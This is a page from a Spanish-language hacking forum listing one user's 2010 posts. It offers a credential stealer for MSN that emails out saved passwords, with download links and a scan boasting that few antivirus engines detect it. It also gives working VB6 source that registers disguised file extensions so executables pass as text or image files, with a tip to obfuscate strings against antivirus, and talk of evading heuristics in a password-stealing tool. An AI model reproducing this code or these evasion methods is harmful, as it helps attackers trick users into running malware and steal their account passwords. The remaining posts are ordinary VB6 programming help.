elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 [59] 60 61 62 63 64
581  Seguridad Informática / Análisis y Diseño de Malware / [SRC] [VB6] Elemental MSN Stealer en: 26 Julio 2010, 17:10 pm
Que hace?
Obtiene contraceñas y las manda por email

Para que sirve?
Mata, Mata, MATAA!
Si te olvidaste la contraceña y la tenes guardada en el msn con esto la recuperas.

Como hace?
Usa el modulo WLMPD de Cobein.

Foto:




Escaneo:
File Info

Report date: 2010-07-26 16:09:29 (GMT 1)
File name: ElementalStub.dll
File size: 49152 bytes
MD5 Hash: cd7d2e1805a1c57d747da1dee5428aaf
SHA1 Hash: 383b5f71c797c99942cef684a94a2c99fce7103d
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Spy.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/VBTrojan.17G!Maximus
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -


Ver Reporte

Descarga
Depositfiles:
http://depositfiles.com/files/7lxj5fqz3

Mirror Fileserve:
http://www.fileserve.com/file/KeGv9VW
582  Programación / Programación Visual Basic / [SRC] mInfectExt.bas [Infeccion de extensiones] en: 24 Julio 2010, 22:41 pm
Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
Posta esto sirve?
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj
Código:
HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"

Codigo mInfectExt
Código
  1. Option Explicit
  2. ' /-----------------------------------------------------------------------------------\
  3. '|=====================================================================================|
  4. '|=/---------------------------------------------------------------------------------\=|
  5. '|=| Module      : mInfectExt                                                        |=|
  6. '|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
  7. '|=| Author      : Elemental Code                                                    |=|
  8. '|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
  9. '|=| WebPage     : I haven't got one Yet ^.^                                         |=|
  10. '|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
  11. '|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
  12. '|=| Distribution: You can freely use this code in your own                          |=|
  13. '|=|               applications, but you may not reproduce                           |=|
  14. '|=|               or publish this code on any web site,                             |=|
  15. '|=|               online service, or distribute as source                           |=|
  16. '|=|               on any media without express permission.                          |=|
  17. '|=\---------------------------------------------------------------------------------/=|
  18. '|=====================================================================================|
  19. ' \-----------------------------------------------------------------------------------/
  20. Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
  21.     Dim WS As Object
  22.     Dim FullExt As String
  23.     Dim UniqVal As String
  24.     UniqVal = Ext & "File"
  25.     FullExt = "." & Ext
  26.  
  27.     Set WS = CreateObject("WScript.Shell")
  28.     WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
  29.     WS.RegWrite "HKCR\" & UniqVal & "\", Info
  30.     If Ocult = True Then
  31.         WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
  32.     EndIf
  33.     WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
  34. End Function
  35.  

Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)
Código
  1. InfectExt "virus", "Archivo de Texto", True


PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^


Editado, Ahora permite elegir si la extensión queda siempre oculta o no.
583  Programación / Programación Visual Basic / Re: [m][VB6-FUD] kRunPE - Ejecuta ejecutables desde ByteArray :) en: 24 Julio 2010, 22:26 pm
Genial el code.
Ojala lo entendiera  :-( :huh: :-X :-\

PD: Avira es el unico que detecto mi stealer con el codigo de Cobein.

Me parece que es re paranoico porque lo que detectaba era la funcion para mandar mails a gmail y no el modulo passdump >.<

Ya desvie el tema demasiado.

Buen code
584  Programación / Programación Visual Basic / Ayuda en el diseño de form en: 20 Julio 2010, 05:18 am
Hoaaa  :rolleyes: :rolleyes:

Voy a hacer un programa trilladisimo.
Guarda los contactos de msn en un documento y permite agregarlos todos juntos de una vez ^^

Quisiera saber como hago para que el programa tenga "Pestañas".
ejemplo:

(los botoncitos logs, builder, stealer)
Como funciona el cls (modulo de clase) XP button y que ventaja tiene frente a mi querido Command Button
y ultima:
como hago para que un list box tenga varias columnas?.

Gracias ^^
585  Programación / Programación Visual Basic / Re: Mandar archivo exe por socket en: 19 Julio 2010, 20:38 pm
Puede que yo sea un salame sin remedio perooo.

Obtener codigo:
Código
  1.     dim codigo as string 'el codigo binario
  2.     dim exefile as string 'la ruta de tu exe
  3.  
  4.     Open Exefile For Binary As #1
  5.     codigo = Space(LOF(1))
  6.     Get #1, , codigo
  7.     Close #1
  8.  

Para escribir Codigo:
Código
  1.     dim exefile as string 'la ruta adonde guardas el nuevo exe
  2.     dim codigorecibido as string 'el codigo binario que recibiste con el winsock
  3.  
  4.     Open exefile For Binary As #1
  5.     Put #1, , CodigoRecibido
  6.     Close #1


Ahora adapta eso para que funcione con tu codigo
586  Programación / Programación Visual Basic / Re: [Src] MultiClic In OneClic en: 19 Julio 2010, 20:33 pm
se como hacer.
supongamos que tu form tiene

Width = 6285

height = 4320

entonces haces esto
(suponiendo que tu mdi se llama MDIForm1)

Código
  1. Private Sub MDIForm_Resize()
  2.     Me.Height = 4320
  3.     Me.Width = 6285
  4. End Sub

Esto va a evitar que el formulario cambie de tamaño.
pero el problema es que si lo maximizaran obtendrian un pechocho error de ejecutacion.

Fijate que mas encontras.
587  Programación / Programación Visual Basic / Re: [Src] MultiClic In OneClic en: 19 Julio 2010, 16:45 pm
Cita de: karmany en 19 Julio 2010, 16:03 pm
Cita de: BlackZeroX
Estoy aburrido...

Si te vuelves a aburrir, tú que eres un gran programador y yo no tengo nada de tiempo, a ver si podrías capturar el dobleclick en la barra de título de un formulario  para que no se redimensione.

cambia el Style a fixed Dialog o fixed Toolbar >.<
588  Programación / Programación Visual Basic / Re: [Src] MultiClic In OneClic en: 18 Julio 2010, 03:43 am
Faaaa Como el antiguo autoclick que usaba para entrar en los servers del mu que estaban full.

que recuerdos ^.^

Ahora miro el codigo, gracias por los recuerdos.
589  Programación / Programación Visual Basic / [SRC] mRndString.bas [Genera Strings Aleatorias] en: 18 Julio 2010, 03:41 am
Que hace?
Genera strings aleatorias entre dos rango de caracteres ascii

Para que sirve?
y yo como voy a saber
Para crear contraceñas o claves

Como hace?
uso como seed la division "timer" (ni idea que es eso, me lo dijo un amigo y no se de donde sale ese numero.) por la hora del sistema.
despues uso rnd para "fabricar" un numero y a eso lo multiplica por la diferencia entre el maximo valor ascii y el minimo mas uno. Al resultado se le suma el minimo valor ascii y despues se convierte a caracter con la funcion chr

Codigo mRndString
Código
  1. '/-------------------------------------------------------------------------------------\
  2. '|=====================================================================================|
  3. '|=/---------------------------------------------------------------------------------\=|
  4. '|=| Module      : mRndString                                                        |=|
  5. '|=| DateTime    : 17/07/2010 07:42 PM                                               |=|
  6. '|=| Author      : Elemental Code                                                    |=|
  7. '|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
  8. '|=| WebPage     : I haven't got one Yet ^.^                                         |=|
  9. '|=| Purpose     : Generates Randoms Strings (like a Password)                       |=|
  10. '|=| Requirements: Two hands (I havent tried with one, it migth work, I don't know)  |=|
  11. '|=| Distribution: You can freely use this code in your own                          |=|
  12. '|=|               applications, but you may not reproduce                           |=|
  13. '|=|               or publish this code on any web site,                             |=|
  14. '|=|               online service, or distribute as source                           |=|
  15. '|=|               on any media without express permission.                          |=|
  16. '|=\---------------------------------------------------------------------------------/=|
  17. '|=====================================================================================|
  18. '\-------------------------------------------------------------------------------------/
  19. Option Explicit
  20. Public Function Random_String(StringLength As Long) As String
  21.     Dim FinalString As String
  22.     Dim MaxAscii As Integer
  23.     Dim MinAscii As Integer
  24.     Dim CurLength As Long
  25.  
  26.     'ENG: 48 to 126 All characters | 65 to 126 just letters |48 to 57 Numbers Only | for more info get an ascii table. >.<
  27.     'ESP: 48 al 126 Todos los caracteres | 65 al 126 solo letras | 48 al 57 Solo Numeros | Para mas info buscate una table ascii >.<
  28.     MaxAscii = 126
  29.     MinAscii = 48
  30.  
  31.     'ENG: to make it as random as I can the number changes each milisecond.
  32.     'ESP: para hacerlo lo mas aleatorio posible el numero cambia cada milisegundo.
  33.     Randomize Timer / Val(Time)
  34.  
  35.  
  36.     For CurLength = 1 To StringLength
  37.         FinalString = FinalString & Chr(Int((MaxAscii - MinAscii + 1) * Rnd + MinAscii))
  38.     Next CurLength
  39.  
  40.     Random_String = StrReverse(FinalString)
  41. End Function
  42.  

Proyecto de ejemplo
Pongan en un form 2 textbox y un comand button
el siguiente codigo va en el codigo del boton
(la caja 1 sera la string generada y la caja 2 sera la longitud)
Código
  1. Text1.Text = Random_String(Text2.Text)

Espero que sirva ^.^
590  Seguridad Informática / Análisis y Diseño de Malware / Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM en: 14 Julio 2010, 21:26 pm
me gusto la idea de poner los datos en los comentarios del exe.

con eso te sacas de ensima la heuristica de los av cuando detectan que te abris a vos mismo.

Muy bueno, ya veo el codigo.


esteeeee...

me trabe.
quise armar un builder y me di cuenta de que no tengo ni idea de como cambiar la informacion del ejecutable...

voy a googlear, si alguien sabe me avisa?
Páginas: 1 ... 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 [59] 60 61 62 63 64
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines